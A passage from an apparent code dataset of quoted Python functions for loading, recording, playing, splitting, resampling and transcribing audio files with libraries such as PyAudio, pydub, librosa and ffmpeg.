Pool()\n results = [pool.apply_async(audio_sample_to_img, args=(sample, rate, secs_per_spec)) for sample in split_data]\n specs = [p.get() for p in results]\n\n return specs", "def direct_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n \n data_file = open(file_name, 'rb', chunk)\n\n # PyAudio instance\n p = pyaudio.PyAudio()\n\n # Open stream\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n data = data_file.read(chunk)\n\n # Playing the data\n while data != \"\":\n stream.write(data)\n data = data_file.read(chunk)\n\n # Ending things\n stream.stop_stream()\n stream.close()\n p.terminate()", "def _load(self, filepath):\n import subprocess as sp\n command = ['ffmpeg',\n '-i', filepath,\n '-f', 's16le',\n '-acodec', 'pcm_s16le',\n '-ac', '1'] # channels: 2 for stereo, 1 for mono\n if self.sampling_rate != SAMPLING_RATE:\n command.extend(['-ar', str(self.sampling_rate)])\n command.append('-')\n # 30s at 44.1 kHz ~= 1.3e6\n proc = sp.run(command, stdout=sp.PIPE, bufsize=10**7, stderr=sp.DEVNULL, check=True)\n\n return np.fromstring(proc.stdout, dtype=\"int16\")", "def stream_file(filename):\n wf = wave.open(filename, 'rb')\n # read in ~100ms chunks\n chunk = int(wf.getframerate() / 10)\n data = wf.readframes(chunk)\n while True:\n try:\n while connected:\n if data != '' and len(data) != 0:\n sio.emit('data', data)\n # sleep for the duration of the audio chunk\n # to mimic real time playback\n sio.sleep(0.1)\n data = wf.readframes(chunk)\n else:\n print('EOF, pausing')\n sio.sleep(0.5)\n wf = wave.open(filename, 'rb')\n data = wf.readframes(chunk)\n print('restarting playback')\n sio.sleep(0.2)\n except socketio.exceptions.ConnectionError as err:\n print('Connection error: %s! Retrying at %s' %\n (err, datetime.utcnow()))\n except KeyboardInterrupt:\n return", "def spectrogram_from_file(filename, step=10, window=20, max_freq=None,\n eps=1e-14, time_up=12, time_down=2):\n sample_rate, audio = wavfile.read(filename) \n audio = audio / np.sqrt(np.sum(np.square(audio)))\n if audio.ndim >= 2:\n audio = np.mean(audio, 1)\n if max_freq is None:\n max_freq = sample_rate / 2\n if max_freq > sample_rate / 2:\n raise ValueError(\"max_freq must not be greater than half of \"\n \" sample rate\")\n if step > window:\n raise ValueError(\"step size must not be greater than window size\")\n hop_length = int(0.001 * step * sample_rate)\n fft_length = int(0.001 * window * sample_rate)\n pxx, freqs = spectrogram(\n audio, fft_length=fft_length, sample_rate=sample_rate,\n hop_length=hop_length)\n ind = np.where(freqs <= max_freq)[0][-1] + 1\n\n # audio record time limit\n is_saved = False\n sample_time = int(len(audio) / sample_rate * 1000)\n if sample_time <= time_up * 1000 and sample_time >= time_down * 1000:\n is_saved = True\n\n return np.transpose(np.log(pxx[:ind, :] + eps)), is_saved", "def direct_record(file_name,\n time,\n chunk = 1024,\n sample_rate = 44100,\n format = pyaudio.paInt16,\n channel = 1):\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = format,\n channels = channel,\n rate = sample_rate,\n input = True,\n frames_per_buffer = chunk)\n\n frames = []\n\n for i in range(0, int(sample_rate / chunk * time)):\n data = stream.read(chunk)\n frames.append(data)\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n data_file = open(file_name, 'wb', chunk)\n data_file.write(b''.join(frames))\n data_file.close()", "def split_multiple_recordings_file(file_path, min_silence_duration=0.25, noise_threshold=150):\n print(file_path)\n rate, audio = scipy.io.wavfile.read(file_path)\n split_recordings = split_multiple_recordings(audio, min_silence_duration=min_silence_duration,\n noise_threshold=noise_threshold, sample_rate_hz=rate)\n\n if file_path.count('.') != 1:\n raise Exception('File_path must contain exactly one period, usually in extension. IE: /home/test.wav')\n\n for idx, recording in enumerate(split_recordings):\n print(\"spliting \" + file_path)\n new_file_path = file_path.split('.')[0] + '_' + str(idx) + \".wav\"\n scipy.io.wavfile.write(new_file_path, rate, recording)", "def load_wav_16k_mono(self, filename):\n filename = utils.get_file_path('webapp/static/processed', filename)\n\n file_contents = tf.io.read_file(filename)\n wav, sample_rate = tf.audio.decode_wav(file_contents,\n desired_channels=1)\n wav = tf.squeeze(wav, axis=-1)\n sample_rate = tf.cast(sample_rate, dtype=tf.int64)\n wav = tfio.audio.resample(wav, rate_in=sample_rate, rate_out=16000)\n return wav", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def divide_chunks(audio_file_, chunksize):\n\n for j in range(0, len(audio_file_), self.chunksize):\n yield audio_file[j:j + chunksize]", "def split_on_silence_threshold(wav_file, dest_dir):\n # Read the file\n audioSegment = AudioSegment.from_wav(wav_file)\n # Calculating the silence threshold\n # Normalizing the audio file belfore finding the threshold\n full_audio_wav = normalize(audioSegment)\n loudness_ms_list = [] # Save the audio levels of all the chunks\n for ms_chunk in full_audio_wav:\n loudness_ms_list.append(round(ms_chunk.dBFS))\n print(\"Audio levels are recorded\", file=sys.stderr)\n # Using pandas df for easier manipulation\n df = pd.DataFrame(loudness_ms_list)\n df[0] = df[df[0] != float(\"-inf\")] # Remove the very low levels\n st = df[0].mean()\n st = st if st < -16 else -16 # Because -16db is default\n # Splits the audio if silence duration is MSL long\n MSL = 500 # minimum silence length in ms\n chunks = split_on_silence(\n full_audio_wav, \n # split on silences longer than 500ms (500ms)\n min_silence_len=MSL, \n # anything under -16 dBFS is considered silence\n silence_thresh=st, \n # keep 200 ms of leading/trailing silence\n keep_silence=200, \n )\n # Saving all the chunks\n print(\"Writing all the files, this may take some time!\", file=sys.stderr)\n for index, chunk in enumerate(chunks):\n chunk_file_name = os.path.join(dest_dir, \"sample_{}.wav\".format(str(index).zfill(10)))\n print(\"Saving the file to \" + chunk_file_name, file=sys.stderr)\n # You can export as mp3 etc, note that it has dependency on ffmpeg\n chunk.export(chunk_file_name, format=\"wav\")", "def simp(filename, seconds_per_average=0.001):\n wavefile = wave.open(filename, 'rb')\n print \"# gnuplot data for %s, seconds_per_average=%s\" % \\\n (filename, seconds_per_average)\n print \"# %d channels, samplewidth: %d, framerate: %s, frames: %d\\n# Compression type: %s (%s)\" % wavefile.getparams()\n\n framerate = wavefile.getframerate() # frames / second\n frames_to_read = int(framerate * seconds_per_average)\n print \"# frames_to_read=%s\" % frames_to_read\n\n time_and_max = []\n values = []\n count = 0\n while 1:\n fragment = wavefile.readframes(frames_to_read)\n if not fragment:\n break\n\n # other possibilities:\n # m = audioop.avg(fragment, 2)\n # print count, \"%s %s\" % audioop.minmax(fragment, 2)\n\n m = audioop.rms(fragment, wavefile._framesize)\n time_and_max.append((count, m))\n values.append(m)\n count += frames_to_read\n # if count>1000000:\n # break\n\n # find the min and max\n min_value, max_value = min(values), max(values)\n points = [] # (secs,height)\n for count, value in time_and_max:\n points.append((count/framerate,\n (value - min_value) / (max_value - min_value)))\n return points", "def slice_recording(path_recording, path_metadata_filepath_duration):\n\n metadata_filepath_duration = open(path_metadata_filepath_duration, 'r')\n\n start = 0.0\n\n for line in metadata_filepath_duration:\n filepath, duration = line.split(\" | \")\n target_filepath = re.sub('/Mixtures/', '/mic_recordings/Mixtures/', filepath)\n target_parentpath = re.sub('/mixture.wav', '', target_filepath)\n\n # creating folder if the folder doesnot exist\n try:\n os.makedirs(target_parentpath)\n except OSERROR as exception:\n if exception.errno == errno.EEXIST and os.path.isdir(target_parentpath):\n pass\n\n delta_t = float(duration)\n\n # calling ffmpeg to slice the wav file into its respective sizes\n subprocess.call([\"ffmpeg\", \"-i\", path_recording, \"-ss\", str(start), \"-t\", str(delta_t), \"-acodec\", \"copy\", target_filepath])\n\n # resetting the start for next file in line\n start += delta_t\n\n metadata_filepath_duration.close()", "def micsample(listentime):\n frames, sampling_rate = record_audio(listentime)\n samples = np.hstack([np.frombuffer(i, np.int16) for i in frames])\n times = np.arange(samples.size) / sampling_rate\n return samples, times", "def preprocessing(filename):\n reporting(\"Preprocessing file...\", True)\n chdir(path.dirname(filename))\n (rate, sig) = wavefile.load(path.split(filename)[1])\n signal = sig[0]\n\n duration = len(signal) / rate\n reporting(f\"Done. Duration={duration}\")\n return signal", "def load_audio_data(file_path, config):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n if audio_seg.frame_rate != config.sample_rate_hertz:\n raise ValueError(\"Mismatch in sample rate: expected: %d; got: %d\" % (\n config.sample_rate_hertz, audio_seg.frame_rate))\n if audio_seg.channels != config.audio_channel_count:\n raise ValueError(\n \"Mismatch in audio channel count: expected: %d; got: %d\" % (\n config.audio_channel_count, audio_seg.channels))\n samples = list(audio_seg.get_array_of_samples())\n # NOTE(cais): We currently use LINEAR16 in the stream requests regardless of\n # the original audio file format. Is it possible to avoid converting FLAC to\n # LINEAR16 during these cloud requests?\n return struct.pack('<%dh' % len(samples), *samples)", "def read_process_song(path, window=1, overlap=0, debug=True):\n\n arr_features = []\n\n signal, sr = librosa.load(path)\n signal = signal[:660000]\n\n # Debug process\n if debug:\n print(\"Reading file: {}\".format(path))\n\n # Split songs:\n samples = split_songs(signal, window, overlap)\n\n # Append the result to the data structure\n for s in samples:\n features = get_features(s, sr)\n arr_features.append(features)\n return arr_features", "def play_audio_file(self, fname=DETECT_DONG):\n ding_wav = wave.open(fname, 'rb')\n ding_data = ding_wav.readframes(ding_wav.getnframes())\n # with no_alsa_error():\n audio = pyaudio.PyAudio()\n stream_out = audio.open(\n format=audio.get_format_from_width(ding_wav.getsampwidth()),\n channels=ding_wav.getnchannels(),\n rate=ding_wav.getframerate(), input=False, output=True)\n stream_out.start_stream()\n stream_out.write(ding_data)\n time.sleep(0.2)\n stream_out.stop_stream()\n stream_out.close()\n audio.terminate()", "def read(f, normalized=False):\r\n a = pydub.AudioSegment.from_mp3(f)\r\n y = np.array(a.get_array_of_samples())\r\n if a.channels == 2:\r\n y = y.reshape((-1, 2))\r\n if normalized:\r\n return a.frame_rate, np.float32(y) / 2**15\r\n else:\r\n return a.frame_rate, y", "def modulated_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n\n data = np.fromfile(file_name, dtype = np.uint8)\n wave = custom.modulate(data)\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n stream.write(wave)\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def splice_audio(file_path, start, end):\n audio = AudioSegment.from_mp3(file_path)\n\n # Pull thumbnail\n tags = ID3(file_path)\n thumbnail = tags.get(\"APIC:\").data\n\n # Pull any other tags from og audio file\n tags = mediainfo(file_path).get('TAG', {})\n\n # Get start and and end paramters\n # to pull the audio splice of interest\n start = timestamp_to_milliseconds(start)\n end = timestamp_to_milliseconds(end)\n\n spliced = audio[start:end]\n spliced.export(\n file_path,\n format=\"mp3\",\n tags=tags\n )\n\n audiofile = eyed3.load(file_path)\n audiofile.tag.images.set(3, thumbnail, 'image/jpeg')\n audiofile.tag.save()", "def load(filename):\n root,ext = _os_path.splitext(filename)\n loader = LOADER[ext]\n frequency,raw_signal = loader(filename)\n iinfo = _numpy.iinfo(raw_signal.dtype)\n raw_signal_midpoint = (iinfo.max + iinfo.min)/2.\n raw_signal_range = iinfo.max - raw_signal_midpoint\n unit_output_signal = (raw_signal - raw_signal_midpoint)/raw_signal_range\n return (frequency, unit_output_signal)", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, input_device_index=0, channels=1, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n num_silent = 0\n snd_started = False\n\n r = array('h')\n while 1:\n snd_data = array('h', stream.read(CHUNK_SIZE, exception_on_overflow = False))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n print(\"Sound started.\")\n snd_started = True\n\n if snd_started and num_silent> 10:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n #r = trim(r)\n #r = add_silence(r, 0.5)\n return sample_width, r", "def load_wav(wav_file):\n rate, data = wavfile.read(wav_file)\n return rate, data", "def load_and_get_stats(filename):\n\n import scipy.io.wavfile as siow\n sampling_rate, amplitude_vector = siow.read(filename)\n\n wav_length = amplitude_vector.shape[0] / sampling_rate\n\n return sampling_rate, amplitude_vector, wav_length", "def loadTTLPulse(file, n_channels = 2, fs = 20000, track = 0, mscope = 1):\n f = open(file, 'rb')\n startoffile = f.seek(0, 0)\n endoffile = f.seek(0, 2)\n bytes_size = 2 \n n_samples = int((endoffile-startoffile)/n_channels/bytes_size)\n f.close()\n with open(file, 'rb') as f:\n data = np.fromfile(f, np.uint16).reshape((n_samples, n_channels))\n \n ch_track = data[:,track].astype(np.int32)\n peaks,_ = scipy.signal.find_peaks(np.diff(ch_track), height=30000)\n timestep = np.arange(0, len(data))/fs\n peaks+=1\n ttl_track = pd.Series(index = timestep[peaks], data = data[peaks,track]) \n\n ch_mscope = data[:,mscope].astype(np.int32)\n peaks,_ = scipy.signal.find_peaks(np.abs(np.diff(ch_mscope)), height=30000)\n peaks+=1\n ttl_mscope = pd.Series(index = timestep[peaks], data = data[peaks,mscope])\n\n return ttl_track, ttl_mscope", "def __init__(self,\n words_per_minute=15.0,\n tone_frequency=500.0,\n sample_rate=11025,\n audio_file_name='morse.wav'):\n self.words_per_minute = words_per_minute\n self.dot_time_in_msec = 0.0\n self.tone_frequency = tone_frequency\n self.sample_rate = sample_rate\n self.sample_period = 1.0 / float(self.sample_rate)\n self.audio_file_name = audio_file_name\n # Buffers to cache synthesized sample data.\n self.pulse_shaping_list = []\n self.dot_sample_buffer = None\n self.dash_sample_buffer = None\n self.silence_4_sample_buffer = None\n self.silence_2_sample_buffer = None\n self.silence_1_sample_buffer = None\n # The main sample buffer.\n self.sample_buffer = None\n # Text queue data.\n self.text_queue = queue.Queue()\n self.stop_and_clear_queue = False\n # Set the dot time in milliseconds based on the sending speed.\n self.set_words_per_minute(self.words_per_minute)\n # Initialize the sample buffers.\n self._cache_dot_dash_sample_data()\n self._cache_silence_sample_data()\n # Audio data.\n self.player = None\n self.audio_finished_event = threading.Event()\n self.audio_thread_continue = True\n threading.Thread.__init__(self)\n # The inherited threading.start() methods calls the\n # derived self.run() method in another thread.\n self.start()", "def __init__(self, dbpath, seconds=3):\n\n self.dbpath = dbpath\n self.CHUNK = 2048\n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 44100\n self.RECORD_SECONDS = seconds\n\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(format=self.FORMAT, channels=self.CHANNELS, rate=self.RATE, input=True, frames_per_buffer=self.CHUNK, input_device_index=1)\n self.frames = deque()\n\n try:\n for i in range(0, int(self.RATE / self.CHUNK * self.RECORD_SECONDS)):\n data = self.stream.read(self.CHUNK)\n self.frames.append(data)\n except:\n pass\n\n self.AudioThread = threading.Thread(target=self._read_loop, args=())\n self.AudioThread.start()", "def record_audio(self):\n stream = self.audio.open(format=DEFAULT_FORMAT,\n channels=DEFAULT_CHANNELS,\n rate=DEFAULT_RATE,\n input=True,\n frames_per_buffer=DEFAULT_CHUNK_SIZE)\n\n print(\"Recording...\")\n\n for i in range(0, int(DEFAULT_RATE / DEFAULT_CHUNK_SIZE * RECORD_SECONDS)):\n data = stream.read(DEFAULT_CHUNK_SIZE)\n self.frames.append(data)\n\n print(\"Done.\")\n\n stream.stop_stream()\n stream.close()", "def record_audio(self, time):\n p = pyaudio.PyAudio()\n stream = p.open(format=self.format,\n channels=self.channels,\n rate=self.rate,\n input=True,\n frames_per_buffer=self.chunk)\n\n print(\"* recording\")\n\n frames = []\n for i in range(0, int(self.rate / self.chunk * time)):\n data = stream.read(self.chunk)\n frames.append(data)\n\n print(\"* done recording\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n return p.get_sample_size(self.format), b''.join(frames)", "def rec_one_shot(self, sec, file_name=None):\n self.__open_noncallback_stream()\n frames = []\n for i in range(int(self.RATE / self.CHUNK * sec)):\n data = self.stream.read(self.CHUNK)\n data = np.fromstring(data, dtype=np.int16)\n frames.append(data)\n self.stream.stop_stream()\n if file_name is not None:\n with wave.open(file_name, 'wb') as wav_file:\n wav_file.setnchannels(self.CHANNELS)\n wav_file.setsampwidth(self.recorder.get_sample_size(self.FORMAT))\n wav_file.setframerate(self.RATE)\n wav_file.writeframes(b''.join(frames))\n frame = np.concatenate(frames, 0)\n self.stop_streaming()\n return frame", "def load_wav_file(file_path: str):\n rate, data = wavfile.read(file_path)\n return rate, data", "def load_segment(self):\n \n data = pd.read_csv(self.metadata['file_info']['path'], header = [0, 1], index_col = 0, parse_dates=True)\n \n # Check cycle length against 5 minute duration minimum\n cycle_len_secs = (data.index[-1] - data.index[0]).total_seconds()\n self.data = data\n \n diff = data.index.to_series().diff()[1:2]\n s_freq = 1000000/diff[0].microseconds\n\n self.metadata['file_info']['start_time'] = str(data.index[0])\n self.metadata['analysis_info'] = {'s_freq': s_freq, 'cycle_len_secs': cycle_len_secs}\n self.s_freq = s_freq\n\n print('EEG successfully imported.')", "def load_wav(file_path):\n sample_rate, data = wavfile.read(file_path)\n return data, sample_rate", "def load_audio(path, target_fs=None):\n y, fs = sf.read(path)\n if y.ndim>1:\n y = np.mean(y, axis=1)\n if target_fs is not None and fs!=target_fs:\n #print('Resampling %d->%d...' %(fs, target_fs))\n y = librosa.resample(y, orig_sr=fs, target_sr=target_fs)\n fs = target_fs\n return y, fs", "def analyzeWAV(inputFile):\n data, fs, nbits = audiolab.wavread(inputFile)\n samplingRate = fs\n return [data, samplingRate]", "def play_audio(file: str) -> None:\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy():\n continue", "def playmusic(self, soundfile):\n clock = pygame.time.Clock()\n pygame.mixer.music.load(soundfile)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n clock.tick(FRAMERATE)", "def load_audio_files(path, single_bar=True):\n\n audios = []\n\n for file_root, dirs, files in os.walk(path):\n for name in files:\n # be careful not to get stuck in wrong files like .DS_Store\n if not re.match(r'.*wav', name):\n continue\n name = os.path.join(file_root, name)\n data, sr = sf.read(name)\n assert sr == 44100\n\n if len(data.shape) == 2 and data.shape[1] == 2:\n data = 0.5 * (data[:, 0] + data[:, 1])\n\n # We only use the 2nd bar out of 4\n if single_bar:\n if data.shape[0] >= 4*44100:\n data = data[2*44100:4*44100]\n else:\n data = data[:2*44100]\n\n data = data.astype(np.float32)\n data = torch.from_numpy(data).unsqueeze(dim=0)\n audios.append(data)\n\n return audios", "def load_wav(file_name):\n fs, signal = wavfile.read(file_name)\n signal = np.float32(signal) / (2**(16)/2-1)\n return fs, signal", "def get_audio():\n\tbuf = None\n\tnum_new_bytes = BUFFER_SIZE // REFRESH_BUFFER_FACTOR\n\twith open(INFILE) as fifo:\n\t\twhile True:\n\t\t\tif buf is None:\n\t\t\t\tbuf = fifo.read(BUFFER_SIZE)\n\t\t\telse:\n\t\t\t\tbuf = buf[num_new_bytes:] + fifo.read(num_new_bytes)\n\t\t\tyield buf", "def load_audio_data(self):\n\n self.audio_data = tkFileDialog.askopenfilename()\n self.audio_data_parser = RawAudioDataParser(self.audio_data)\n\n self.audio_entries = sorted(self.audio_data_parser.entries, key=self.get_count, reverse=True)\n\n for index, entry in enumerate(self.audio_entries):\n self.audio_box.insert(index, entry.word)", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def get_audio_file_duration_sec(file_path):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n return audio_seg.duration_seconds", "def load_wav_to_torch(self, full_path):\n data, sampling_rate = load(full_path, sr=self.sampling_rate)\n data = 0.95 * normalize(data)\n\n if self.augment:\n amplitude = np.random.uniform(low=0.3, high=1.0)\n data = data * amplitude\n\n return torch.from_numpy(data).float(), sampling_rate", "def to_voice(item):\r\n item.seek(0)\r\n item = AudioSegment.from_file(item)\r\n m = io.BytesIO()\r\n m.name = \"voice.ogg\"\r\n item.split_to_mono()\r\n dur = len(item) / 1000\r\n item.export(m, format=\"ogg\", bitrate=\"64k\", codec=\"libopus\")\r\n m.seek(0)\r\n return m, dur", "def speech_recognize_continuous_from_file():\n done = False\n\n def stop_cb(evt):\n \"\"\"callback that stops continuous recognition upon receiving an event `evt`\"\"\" \n speech_recognizer.stop_continuous_recognition()\n nonlocal done\n done = True\n\n speech_recognizer.recognized.connect(lambda evt: combine_text(evt)) \n speech_recognizer.session_stopped.connect(stop_cb)\n speech_recognizer.canceled.connect(stop_cb)\n # Start continuous speech recognition\n speech_recognizer.start_continuous_recognition()\n while not done:\n time.sleep(.5)", "def get_large_audio_transcription(path):\n # open the audio file using pydub\n r = sr.Recognizer()\n sound = AudioSegment.from_mp3(path)\n sound.export(\"tmp.wav\", format=\"wav\")\n sound = AudioSegment.from_wav('tmp.wav')\n # split audio sound where silence is 700 miliseconds or more and get chunks\n chunks = split_on_silence(sound,\n # experiment with this value for your target audio file\n min_silence_len = 500,\n # adjust this per requirement\n silence_thresh = sound.dBFS-14,\n # keep the silence for 1 second, adjustable as well\n keep_silence=500,\n )\n folder_name = \"audio-chunks\"\n # create a directory to store the audio chunks\n if not os.path.isdir(folder_name):\n os.mkdir(folder_name)\n whole_text = \"\"\n\n chapter=(str(path.split('/')[-1])).split('_')[3]\n # if chapter == '01':\n # target=2\n # else:\n # target=1\n target=2\n # process each chunk\n for i, audio_chunk in enumerate(chunks, start=1):\n # export audio chunk and save it in\n # the `folder_name` directory.\n if i==1:\n chunk_filename = os.path.join(folder_name, f\"chunk{i}.wav\")\n audio_chunk.export(chunk_filename, format=\"wav\")\n # recognize the chunk\n with sr.AudioFile(chunk_filename) as source:\n audio_listened = r.record(source)\n # try converting it to text\n try:\n text = r.recognize_google(audio_listened,language=\"en-US\")\n\n except sr.UnknownValueError as e:\n print(\"Error:\", str(e))\n else:\n #text = f\"{text.capitalize()}. \"\n #print(chunk_filename, \":\", text)\n whole_text += text\n # return the text for all chunks detected\n else:\n chunk_filename = os.path.join(folder_name, f\"chunk{i}.wav\")\n audio_chunk.export(chunk_filename, format=\"wav\")\n # recognize the chunk\n with sr.AudioFile(chunk_filename) as source:\n audio_listened = r.record(source)\n # try converting it to text\n try:\n text = r.recognize_google(audio_listened, language=\"en-US\")\n\n except sr.UnknownValueError as e:\n print(\"Error:\", str(e))\n else:\n #text = f\"{text.capitalize()}. \"\n # print(chunk_filename, \":\", text)\n if chapter == '01':\n whole_text += ' ' +text\n if str(text).isalnum():\n if str(text).split(' ')[0]==' ':\n whole_text += text\n else: whole_text += ' '+text\n # return the text for all chunks detected\n\n if i==target:\n break\n if os.path.isfile('tmp.wav') :os.remove('tmp.wav')\n subprocess.run([\"rm\", \"-rf\", folder_name])\n return whole_text", "def read_wav(wav_file):\n w = wave.open(wav_file)\n n = 60 * 10000\n if w.getnframes() < n * 2:\n raise ValueError('Le fichier est trop court')\n frames = w.readframes(n)\n wav_data1 = struct.unpack('%dh' % n, frames)\n frames = w.readframes(n)\n wav_data2 = struct.unpack('%dh' % n, frames)\n return wav_data1, wav_data2", "def audio_resample(self, data):\n\n data = np.asarray(data)\n if data.ndim <= 1:\n logging.log_first_n(logging.INFO,\n 'Converting %s sound from shape %s to 2-D' %\n (self._name, data.shape), 5)\n data = np.reshape(data, (-1, 1))\n if data.shape[1] > data.shape[0]:\n logging.log_first_n(logging.INFO,\n 'Transposing %s sound from shape %s' %\n (self._name, data.shape), 5)\n data = np.transpose(data)\n\n # Get half window size in seconds.\n half_window_size = 0.5 * self._window / self._fs_out\n\n # Concatenate and update buffer.\n if self._buff is not None:\n data = np.concatenate((self._buff, data), axis=0)\n tau = self._buff.shape[0]\n else:\n tau = 0\n self._buff = data[-int(self._fs_in * half_window_size):, :]\n\n # Get i/o data dimensions.\n frames_in = data.shape[0]\n frames_out = int(round((frames_in - tau) / self._fs_in * self._fs_out))\n\n # Resample data via moving average.\n data_out = np.zeros((frames_out, data.shape[1]))\n if self._fs_out < self._fs_in or self._window > 1:\n for i in range(frames_out):\n t = float(i) / self._fs_out # center of window in seconds\n t1 = int(max(0, round(self._fs_in * (t - half_window_size)) + tau))\n t2 = int(min(frames_in,\n round(self._fs_in * (t + half_window_size)) + tau))\n data_out[i, :] = np.mean(data[t1:t2, :], axis=0)\n\n else:\n\n data_out = data\n\n return data_out", "def read_audio(filename, sample_rate = 44100):\n loader = essentia.standard.MonoLoader(filename = filename, sampleRate = sample_rate)\n audio = loader()\n return audio", "def load_wav_to_torch(full_path):\n sampling_rate, data = read(full_path)\n return torch.from_numpy(data).float(), sampling_rate", "def read_wav(fname, normalize=True):\n # samps_int16: N x C or N\n # N: number of samples\n # C: number of channels\n sampling_rate, samps_int16 = wavfile.read(fname)\n # N x C => C x N\n samps = samps_int16.astype(np.float)\n # tranpose because I used to put channel axis first\n if samps.ndim != 1:\n samps = np.transpose(samps)\n # normalize like MATLAB and librosa\n if normalize:\n samps = samps / MAX_INT16\n return sampling_rate, samps", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n num_silent = 0\n snd_started = False\n\n r = array('h')\n\n while 1:\n # little endian, signed short\n snd_data = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n snd_started = True\n\n if snd_started and num_silent > 30:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n r = trim(r)\n r = add_silence(r, 0.5)\n return sample_width, r", "def play(path):\n sound = AudioSegment.from_mp3(path)\n playback.play(sound)", "def mix_in_audio_sample(track_data, track_offset, sample_data, sample_offset,\n clip_duration, sample_volume, ramp_in, ramp_out):\n ramp_out_index = clip_duration - ramp_out\n track_end = min(track_offset + clip_duration, track_data.shape[0])\n track_end = min(track_end,\n track_offset + (sample_data.shape[0] - sample_offset))\n sample_range = track_end - track_offset\n for i in range(sample_range):\n if i < ramp_in:\n envelope_scale = i / ramp_in\n elif i > ramp_out_index:\n envelope_scale = (clip_duration - i) / ramp_out\n else:\n envelope_scale = 1\n sample_input = sample_data[sample_offset + i]\n track_data[track_offset\n + i] += sample_input * envelope_scale * sample_volume", "def readFramesAtTime(\n audiofile: wave.Wave_read, startTime: float, endTime: float\n) -> bytes:\n params = audiofile.getparams()\n frameRate = params[2]\n\n audiofile.setpos(round(frameRate * startTime))\n frames = audiofile.readframes(round(frameRate * (endTime - startTime)))\n\n return frames", "def inputwav(filename):\n data, sr = sf.read(filename)\n print('Decoding \"'+filename+'\"...')\n print('Sample rate is '+str(sr)+'...')\n try:\n ch=len(data[0,])\n except:\n ch=1\n print('File contains '+str(ch)+' audio channel(s)...')\n #Reshape the data so other functions can interpret the array if mono.\n #basically transposing the data\n if ch==1:\n data=data.reshape(-1,1)\n n=len(data)\n #This prevents log(data) producing nan when data is 0\n data[np.where(data==0)]=0.00001\n #convert to dB\n data_dB=20*np.log10(abs(data))\n return n, data,data_dB,sr, ch", "def view(filename):\n n, data, data_dB,sr,ch=inputwav(filename)\n t=np.linspace(0,n/sr,n)\n py.close()\n fig, (ax1) = py.subplots(nrows=1) \n ax1.plot(t[0:n:100],data[0:n:100],'k-',linewidth=1,label=filename)\n ax1.legend(loc=1)\n ax1.set_ylabel('Amplitude (Rel. Bit)')\n ax1.set_xlabel('Time (s)')", "def file2spec(path_file, scale_spec=\"linear\", N_MELS=40, window_length=0.020, overlap=0.5, f_max=15000, duration=None):\r\n\r\n # Load audio file\r\n x_fs, x = load_audio(path_file)\r\n\r\n shape = np.shape(x)\r\n # If the file contains several channel\r\n if len(shape) > 1:\r\n x = np.sum(x, axis=1)\r\n if duration is not None:\r\n x = x[:int(x_fs * duration) + 1]\r\n\r\n # Derive FFT parameters\r\n N_FFT = int(window_length * x_fs) + 1\r\n HOP_LEN = int(overlap * window_length * x_fs) + 1\r\n\r\n # Compute spectrograms\r\n if (scale_spec == \"linear\"):\r\n frequency_resolution = x_fs / N_FFT\r\n size_frequency_axis = 1 + floor(f_max / frequency_resolution)\r\n f, t, spec = signal.stft(x, fs=x_fs, nperseg=N_FFT, noverlap=HOP_LEN)\r\n # scipy returns a complex array, only the modulus is used in spectograms\r\n spec = np.abs(spec)\r\n # remove frequency above f_max\r\n if f[-1] > f_max:\r\n fsup_to_fmax = np.where(f > f_max)\r\n f = f[0:fsup_to_fmax[0][0] + 1]\r\n spec = spec[0:fsup_to_fmax[0][0] + 1, :]\r\n\r\n elif (scale_spec == \"MEL\"):\r\n # librosa library does not give access to t and f\r\n spec = librosa.feature.melspectrogram(x, sr=x_fs, n_fft=N_FFT, hop_length=HOP_LEN, n_mels=N_MELS)\r\n spec = np.abs(spec)\r\n t = None\r\n f = None\r\n\r\n else:\r\n raise ValueError(f\"Wrong scale_spec parameter {scale_spec}, use linear or MEL\")\r\n\r\n # Convert power to dB with the minimum as a reference, only positive 